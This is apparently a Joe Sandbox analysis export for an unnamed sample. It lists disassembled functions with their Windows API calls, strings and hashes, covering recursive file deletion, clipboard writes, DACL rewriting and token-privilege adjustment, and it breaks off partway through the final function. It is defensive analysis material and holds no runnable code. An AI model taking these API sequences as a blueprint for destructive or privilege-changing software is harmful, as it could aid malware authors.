API String ID: 1803514871-438819550
Opcode ID: 7c5bc64f36f4a913d85fa50444dc5b660f13ad1ec61fccf101f2423057be61b6
Instruction ID: 61bd5cb7c1f5d9d6a4b49ca5665542b8492f94856efac5a70d05adb3ff2e8cd7
Opcode Fuzzy Hash: 7c5bc64f36f4a913d85fa50444dc5b660f13ad1ec61fccf101f2423057be61b6
Instruction Fuzzy Hash: 35318F3150131A7FDF20EBA4EC48EEE77ADAF09360F184166F915E2190DB70DA54CA74

Function 00DAF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

DragQueryPoint.SHELL32(?,?), ref: 00DAF14B

Part of subcall function 00DAD5EE: ClientToScreen.USER32(?,?), ref: 00DAD617
Part of subcall function 00DAD5EE: GetWindowRect.USER32(?,?), ref: 00DAD68D
Part of subcall function 00DAD5EE: PtInRect.USER32(?,?,00DAEB2C), ref: 00DAD69D

SendMessageW.USER32(?,000000B0,?,?), ref: 00DAF1B4
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DAF1BF
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DAF1E2
_wcscat.LIBCMT ref: 00DAF212
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DAF229
SendMessageW.USER32(?,000000B0,?,?), ref: 00DAF242
SendMessageW.USER32(?,000000B1,?,?), ref: 00DAF259
SendMessageW.USER32(?,000000B1,?,?), ref: 00DAF27B
DragFinish.SHELL32(?), ref: 00DAF282
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00DAF36D

Strings

@GUI_DRAGFILE, xrefs: 00DAF31C
@GUI_DRAGID, xrefs: 00DAF2E1
@GUI_DROPID, xrefs: 00DAF2A2

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: 8c84ca697eac69bfa1aec97a26a106045ce6dd3f03564742d7ba15e27b3fbbbe
Instruction ID: 6bb75ddefb1e9a6858f32df7e6208d70f8da8cbac02fd22b0c5704140b03925f
Opcode Fuzzy Hash: 8c84ca697eac69bfa1aec97a26a106045ce6dd3f03564742d7ba15e27b3fbbbe
Instruction Fuzzy Hash: 5D615A71108305AFC700EFA0DC85E9BBBE9FF89754F004A2DF695921A1DB309A49CB72

Function 00D9219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00D921C0
_wcscmp.LIBCMT ref: 00D921D5
_wcscmp.LIBCMT ref: 00D921EC

Part of subcall function 00D87606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D87621

FindNextFileW.KERNEL32(00000000,?), ref: 00D9221B
FindClose.KERNEL32(00000000), ref: 00D92226
FindFirstFileW.KERNEL32(*.*,?), ref: 00D92242
_wcscmp.LIBCMT ref: 00D92269
_wcscmp.LIBCMT ref: 00D92280
SetCurrentDirectoryW.KERNEL32(?), ref: 00D92292
SetCurrentDirectoryW.KERNEL32(00DF3A68), ref: 00D922B0
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D922BA
FindClose.KERNEL32(00000000), ref: 00D922C7
FindClose.KERNEL32(00000000), ref: 00D922D7

Strings

*.*, xrefs: 00D9223D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 9bbe7928a5a8d86abc2cef4fe9e455e11831bf8977b1c9de3877a407a7092430
Instruction ID: a2474906d562932958d17e2ff36cb37cd97f3a773e3a8175bd401c534ddcbbd1
Opcode Fuzzy Hash: 9bbe7928a5a8d86abc2cef4fe9e455e11831bf8977b1c9de3877a407a7092430
Instruction Fuzzy Hash: C631A33150171A7ECF24EBA4EC49EFE77ADAF45320F1841A5E910E2190DB70DA99CB78

Function 00D46BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D46C22
_memmove.LIBCMT ref: 00D46D9A

Strings

^, xrefs: 00D46BFB
Q\E, xrefs: 00D47548
\, xrefs: 00D46BEE
\, xrefs: 00D46C8B
\, xrefs: 00DC0A25
[, xrefs: 00D46C82
], xrefs: 00D46C04

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove_memset
String ID: Q\E$[$\$\$\$]$^
API String ID: 3555123492-286096704
Opcode ID: bab97a9f4d343232b845d1e146a3f612fcfaa076a21f824f7c7ac80063669c7c
Instruction ID: ad5bb6d6217b26869be6004c1848ed4c398ae57857fade744dfaedcbf1a7971f
Opcode Fuzzy Hash: bab97a9f4d343232b845d1e146a3f612fcfaa076a21f824f7c7ac80063669c7c
Instruction Fuzzy Hash: D1728E71D0421ACBDF24CF98C880BADBBB1FF45314F2981A9D856AB241D734EE81DB61

Function 00D6BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2448ee7af9cdf7adb144507c0fe7a752f1f8e4c680bd73b39a2851d73ee01706
Instruction ID: e0069ca0c532efa7df97e52646ac07bff840b833168756575a3498cf197b8962
Opcode Fuzzy Hash: 2448ee7af9cdf7adb144507c0fe7a752f1f8e4c680bd73b39a2851d73ee01706
Instruction Fuzzy Hash: 55326D75B122698FDB24CF59DC40AE9B7B5FB4A310F4841D9E44AE7A81D7309E80CF62

Function 00DAECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DAED0C
GetFocus.USER32 ref: 00DAED1C
GetDlgCtrlID.USER32(00000000), ref: 00DAED27
_memset.LIBCMT ref: 00DAEE52
GetMenuItemInfoW.USER32 ref: 00DAEE7D
GetMenuItemCount.USER32(00000000), ref: 00DAEE9D
GetMenuItemID.USER32(?,00000000), ref: 00DAEEB0
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00DAEEE4
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00DAEF2C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DAEF64
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00DAEF99

Strings

0, xrefs: 00DAEE4A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 9aec422e05b3c52e00671dce10e58dfc35dc46e1aaae939bfb428d53af94c162
Instruction ID: 9127ae72796024e0c352f400f59298355a7a3d11aee3ed9d32b58425c356c63e
Opcode Fuzzy Hash: 9aec422e05b3c52e00671dce10e58dfc35dc46e1aaae939bfb428d53af94c162
Instruction Fuzzy Hash: B5817B71208312AFDB10DF14C884A6BBBE9FF8A354F04492DF99997291D730DA45CBB2

Function 00D7B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00D7B903
Part of subcall function 00D7B8E7: GetLastError.KERNEL32(?,00D7B3CB,?,?,?), ref: 00D7B90D
Part of subcall function 00D7B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00D7B3CB,?,?,?), ref: 00D7B91C
Part of subcall function 00D7B8E7: RtlAllocateHeap.NTDLL(00000000,?,00D7B3CB), ref: 00D7B923
Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00D7B93A

Part of subcall function 00D7B982: GetProcessHeap.KERNEL32(00000008,00D7B3E1,00000000,00000000,?,00D7B3E1,?), ref: 00D7B98E
Part of subcall function 00D7B982: RtlAllocateHeap.NTDLL(00000000,?,00D7B3E1), ref: 00D7B995
Part of subcall function 00D7B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D7B3E1,?), ref: 00D7B9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D7B3FC
_memset.LIBCMT ref: 00D7B411
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D7B430
GetLengthSid.ADVAPI32(?), ref: 00D7B441
GetAce.ADVAPI32(?,00000000,?), ref: 00D7B47E
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D7B49A
GetLengthSid.ADVAPI32(?), ref: 00D7B4B7
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D7B4C6
RtlAllocateHeap.NTDLL(00000000), ref: 00D7B4CD
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D7B4EE
CopySid.ADVAPI32(00000000), ref: 00D7B4F5
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D7B526
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D7B54C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D7B560

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: ab62b7e54a799652565c203312d71c405489d8f83d55f95664ae0d170129b181
Instruction ID: 7cf0f1db4f19ae91bb82fd717f5b5a11ea69a50776b3c675890074aa0fbcfd8d
Opcode Fuzzy Hash: ab62b7e54a799652565c203312d71c405489d8f83d55f95664ae0d170129b181
Instruction Fuzzy Hash: BA51077190020AAFDF00DFA4DC45EEEBB79FF04714F14812AE929A6291EB359A05DF70

Function 00D86E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA

Part of subcall function 00D87C0C: GetFileAttributesW.KERNEL32(?,00D86A7B), ref: 00D87C0D

_wcscat.LIBCMT ref: 00D86E7E
__wsplitpath.LIBCMT ref: 00D86E99
FindFirstFileW.KERNEL32(?,?), ref: 00D86EAE
_wcscpy.LIBCMT ref: 00D86EDD
_wcscat.LIBCMT ref: 00D86EEF
_wcscat.LIBCMT ref: 00D86F01
DeleteFileW.KERNEL32(?), ref: 00D86F0E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D86F22
FindClose.KERNEL32(00000000), ref: 00D86F3D

Strings

\*.*, xrefs: 00D86E78

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 781e010814d7ee7789372b6bd3c071d5a8df3fe7a208a4ad2654df4056a9fab1
Instruction ID: 453e036bf692b25979fe0cb14c80cc74eb80f1059a6c9bf73a96c851bbce1d1a
Opcode Fuzzy Hash: 781e010814d7ee7789372b6bd3c071d5a8df3fe7a208a4ad2654df4056a9fab1
Instruction Fuzzy Hash: 1D21C172408345AEC611EBA4D8859DBBBDC9F59324F084A6AF5E4C3142EA30D60D8BB2

Function 00D97294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00D972BB
EmptyClipboard.USER32 ref: 00D972C1
GlobalAlloc.KERNEL32(00000002,?), ref: 00D972D6
CloseClipboard.USER32 ref: 00D97375

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 034a15207d7ffe9d7c8f231aa2a3bdac610d8c3efcc93e430470a5dd9940f6aa
Instruction ID: a6b3d54052b72fb335e2e2ef4fd8a0c8425b5c9902553b3cabbfe4674f791d15
Opcode Fuzzy Hash: 034a15207d7ffe9d7c8f231aa2a3bdac610d8c3efcc93e430470a5dd9940f6aa
Instruction Fuzzy Hash: 4E219F31254212AFDB00AF24DC49F2DBBA9EF44721F048029F94ADB3A1DB30E940DBB4

Function 00D924A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00D924F6
Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00D92526
_wcscmp.LIBCMT ref: 00D9253A
_wcscmp.LIBCMT ref: 00D92555
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00D925F3
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00D92609

Strings

*.*, xrefs: 00D924D8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 9b8918dc5b2bffd9e19a0c2b5734e437ee1aa2fb2a2056010272e6b843ddab8b
Instruction ID: a71db15fe4bfdb3e92c047dcd5fb88baafc4de3e66a386079a4afaca13e174a1
Opcode Fuzzy Hash: 9b8918dc5b2bffd9e19a0c2b5734e437ee1aa2fb2a2056010272e6b843ddab8b
Instruction Fuzzy Hash: 95415C7194021AAFCF54DFA4CC59AEEBBB4FF19310F144456E815A2291EB309A94CFB0

Function 00D48CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00D48FCB
VUUU, xrefs: 00D4900A
ERCP, xrefs: 00D48D68
VUUU, xrefs: 00DCC736
VUUU, xrefs: 00D48FDD

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 7dbad8315e41b8918c5a4563805042342fc8147779042348b3846f5bc53f5f9a
Instruction ID: fd4ad38d345abb3e75835ffcc5772048e96cc6af11bffa9419b7e24e318a77d7
Opcode Fuzzy Hash: 7dbad8315e41b8918c5a4563805042342fc8147779042348b3846f5bc53f5f9a
Instruction Fuzzy Hash: 4E928F71E1021ACBDF24CF59C894BAEB7B1BB54314F1842AAE95AA7280D770DD81DF70

Function 00D48530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON

Download Yara Rule

APIs

Part of subcall function 00D4A2FB: _memmove.LIBCMT ref: 00D4A33D

_memmove.LIBCMT ref: 00D48672
_memmove.LIBCMT ref: 00D486C2
_memmove.LIBCMT ref: 00D48728

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6c85b0e80165634a75e2551b007e4bc11bd4fc780bb26e1705c3625565062d81
Instruction ID: 9e96c5ef76ee24f236c02b6fc1368a87f36ee1f9e3c374a9048d360cc7e40ce1
Opcode Fuzzy Hash: 6c85b0e80165634a75e2551b007e4bc11bd4fc780bb26e1705c3625565062d81
Instruction Fuzzy Hash: 47127971A00609DBDF04DFA9D991AEEB7F5FF48300F248569E846E7250EB35A911CB70

Function 00DAEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

Part of subcall function 00D5B736: GetCursorPos.USER32(000000FF), ref: 00D5B749
Part of subcall function 00D5B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D5B766
Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000001), ref: 00D5B78B
Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000002), ref: 00D5B799

ReleaseCapture.USER32 ref: 00DAEB1A
SetWindowTextW.USER32(?,00000000), ref: 00DAEBC2
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DAEBD5
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00DAECAE

Strings

@GUI_DRAGFILE, xrefs: 00DAEC49
@GUI_DROPID, xrefs: 00DAEC05

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: 478fc7c3faea91a9f0f0a442c35b98b81100fb824816247cffcf447512760eb0
Instruction ID: 819a5341bf0df7945710034975ccf37c35c51c56caffb0ef6edf95d25b79b2b8
Opcode Fuzzy Hash: 478fc7c3faea91a9f0f0a442c35b98b81100fb824816247cffcf447512760eb0
Instruction Fuzzy Hash: 65519C31204304AFD704EF24CC96F6A7BE5FB89710F004A29F985972E2DB719948CB72

Function 00D882D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00D7BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D7BF0F
Part of subcall function 00D7BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7BF3C
